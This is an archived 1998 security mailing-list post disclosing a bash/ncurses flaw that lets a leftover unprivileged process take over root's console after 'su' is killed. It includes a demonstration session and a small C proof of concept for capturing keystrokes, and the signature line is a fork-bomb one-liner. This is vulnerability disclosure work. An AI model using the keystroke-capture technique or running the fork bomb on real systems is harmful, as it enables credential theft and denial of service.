bash 2.01 / ncurses 4.1 console takeover "feature"

From: Michal Zalewski (lcamtufat_private)
Date: Sat Mar 07 1998 - 12:06:21 PST

Next message: Chip Salzenberg: "Re: Perl bugs (was Re: another /tmp race: `perl -e')"

Previous message: Theo de Raadt: "Re: another /tmp race: `perl -e' opens temp file not safely"
Next in thread: Savochkin Andrey Vladimirovich: "Re: bash 2.01 / ncurses 4.1 console takeover "feature""
Reply: Savochkin Andrey Vladimirovich: "Re: bash 2.01 / ncurses 4.1 console takeover "feature""
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

With bash 2.01 and ncurses 4.1, any program launched at unprivledged
uid (eg. from 'su' shell) may takeover privledged user's console
(to grab keystorkes or something else). I found it's quite easy when
I tried to kill 'su' directly from unprivledged shell with signal 9:

[root@genome /]# su lcam
[lcam@genome /]$ killall -9 su
Killed
[root@genome /]#

That was normal, but suddenly I saw again old prompt:

[lcam@genome /]$

>From this point, two bash instances (unprivledged one hasn't been
killed with su!) were controlling my console at once... It looks
just curious:

[root@genome /]# id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
[lcam@genome /]$ id
uid=502(lcam) gid=502(lcam) groups=502(lcam)
[lcam@genome /]$
[root@genome /]#

Of course, it isn't so scary, because it has been done manually...
But is can be easily used in nasty program. Typical administrator
believes that only unprivledged account may be compromised when
he's launching something on it, and usually he's right, but
ncurses has a vunerability which may be used to fool him. Unlike
other lame su tricks, it's quite invisible (he may check on a
second console - he's back in his REAL, root shell, but we can
still control his console). I wrote simple program (it may be even
aunched from ~/.bashrc; in the meantime, su should be killed), which
is able to grab keystorke(s) from console:

-- test.c --
// gcc test.c -lncurses -oanything
#include <curses.h>
int main() {
  initscr();
  noecho();
  raw();
  while (1) if (getch()=='x') system("touch /tmp/VOILA");
}
-- eof --

It isn't perfect, actually it grabs only one of first 'x's, and fail
to grab next ones (a lot of i/o errors when debugged ;-). But it
CAN do that. For sure it's possible to keep control much longer, as
shown above (bash example). Maybe it's even possible to do it even
after logout, I not checked it.

_______________________________________________________________________
Michał Zalewski [tel 9690] | finger 4 PGP [lcamtufat_private]
Iterować jest rzeczą ludzką, wykonywać rekursywnie - boską [P. Deustch]
=--------------- [ echo "\$0&\$0">_;chmod +x _;./_ ] -----------------=

Next message: Chip Salzenberg: "Re: Perl bugs (was Re: another /tmp race: `perl -e')"
Previous message: Theo de Raadt: "Re: another /tmp race: `perl -e' opens temp file not safely"
Next in thread: Savochkin Andrey Vladimirovich: "Re: bash 2.01 / ncurses 4.1 console takeover "feature""
Reply: Savochkin Andrey Vladimirovich: "Re: bash 2.01 / ncurses 4.1 console takeover "feature""
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 13:44:36 PDT